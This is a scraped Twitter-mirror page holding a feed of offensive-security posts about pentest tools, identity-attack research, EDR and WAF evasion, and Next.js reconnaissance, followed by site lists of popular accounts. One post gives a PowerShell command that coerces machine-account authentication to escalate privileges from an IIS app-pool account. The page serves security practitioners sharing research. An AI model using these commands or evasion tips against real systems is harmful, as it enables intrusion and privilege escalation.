Olivia
Online
🧙 We built Grimoire: a single search box for every offensive playbook, fully offline.
Type ssrf, kerberoast, jwt, sudo and instantly hit the right page across more than 100 curated sources at once. 🔍⚡
I finally came around and documented all the Conditional Access bypasses in a single blog post. It contains not only the documented bypasses, but also the results of new research.
#Entra #ConditionalAccess #Security #Cheese
https://t.co/YWBfY0NhHl
Use NextJS? Recon ✨
A quick way to find "all" paths for Next.js websites:
DevTools->Console
console.log(__BUILD_MANIFEST.sortedPages)
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
Cred = https://t.co/4hiJXDNlmU
#infosec #cybersec #bugbountytips
So I have been told threat actors use my Browser Cache Smuggling technique to compromise people: https://t.co/A9qn5HGZJ9
Remember, detection is really easy: any process touching a browser's cache file and moving it to a .dll one IS A RED FLAG. Detection rule is easy to set ;)!
The whitepaper is live! Learn how to win the HTTP desync endgame... and why HTTP/1.1 needs to die: https://t.co/3vZ2bMx9DA
Today, together with Jonathan Elkabas, we're releasing EntraGoat - A Deliberately Vulnerable Entra ID Environment.
Your own hands-on Entra lab for identity attack simulation.
Built for red teams, blue teams and identity nerds.
Check it out here👉https://t.co/5qlXQiSYHS
Built a small CVE monitoring tool (with help from AI).
GitHub PoCs, Nuclei, product search.
Feedback & bug reports welcome 🙏
👉 https://t.co/lmYOL40A2u
#infosec #bugbounty #cybersecurity #opensource #CVE
That's actually pretty nice if you want to lazily bypass a WAF 👍
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
My personal internal pentest “dirty dozen” list (aka the most dangerous and common internal findings)
*not necessarily in any particular order
1. ESC1
2. ESC4
3. ESC8
4. Kerberoastable admins with weak passwords
5. Plaintext admin or SQL credentials on file shares
6. Insecure nested groups
7. Insecure permissions on a Tier 0 resource
8. Unattend file with valid local admin creds
9. Scheduled tasks running as Tier 0 accounts
10. Services running as SYSTEM with modifiable binaries or paths
11. No LAPS and all local admin passwords the same
12. Domain Admins logged into non-DCs
Everyone wants to spend $100k for EDR but no one wants to take away local admin rights from Suzie in accounting…
You have got a valid NTLM relay but SMB and LDAP are signed, LDAPS has got Channel Binding and ESC8 is not available... What about WinRMS ? :D
Blogpost: https://t.co/p2uwj2yKTQ
Tool: https://t.co/zMPpwtyFir
And also, big thanks to jmk (Joe Mondloch) for the collab' :D!
NetExec v1.4.0 has been released! 🎉
There is a HUGE number of new features and improvements, including:
- backup_operator: Automatic priv esc for backup operators
- Certificate authentication
- NFS escape to root file system
And much more!
Full rundown:
https://t.co/yjaG8rgzSZ
Unveiling the Power of Intune - @TEMP43487580
Slides: https://t.co/l1jZZI9lrN
Pytune is a post-exploitation tool for enrolling a fake device into Intune with mulitple platform support.
https://t.co/S3QnuyyJ77
Exploits often fail because payloads are blocked before they even reach the target ❌
Learn how to disguise your scripts with payload obfuscation techniques such as URL encoding, variable expression assignment and obfuscation in shell environments 👇
https://t.co/vQYSjAKwlt
By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections.
My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees.
Here’s what I found and why it matters 👉 https://t.co/VpMttDZI9K
Here's a list with common JSONP endpoints, feel free to suggest some more below!
Glad to publish a blog post on a critical vulnerability I found some months ago on GLPI, that impacts all default installation under a certain version:
https://t.co/PgleiQEK6e
We also released a tool that implements some check for known vulnerabilities:
https://t.co/DhcvjJ7ZQy
read this https://t.co/Q1NrsqiXsu
Last Seen Users on Sotwe
anggakhamil
Seen from Singapore
mê se.x gay Việt Nam
Seen from Singapore
suamiistri
Seen from Indonesia
Tôn thờ các mẹ trẻ xinh😆
Seen from Vietnam
daplun_12
Seen from Indonesia
فحل عراقي من السماوه
Seen from France
Fu yu
Seen from Japan
ahmdsful._
Seen from Malaysia
cheo gonta
Seen from Indonesia
Nguyễn Đăng Khoa
Seen from Vietnam
Trends for you
Most Popular Users
Elon Musk 
@elonmusk
240.6M followers
Barack Obama
@barackobama
119.2M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.4M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.2M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.6M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
72.9M followers
Virat Kohli
@imvkohli
69.8M followers
Kim Kardashian
@kimkardashian
69.7M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
Neymar Jr
@neymarjr
62.5M followers
The Ellen Show
@theellenshow
62.4M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.7M followers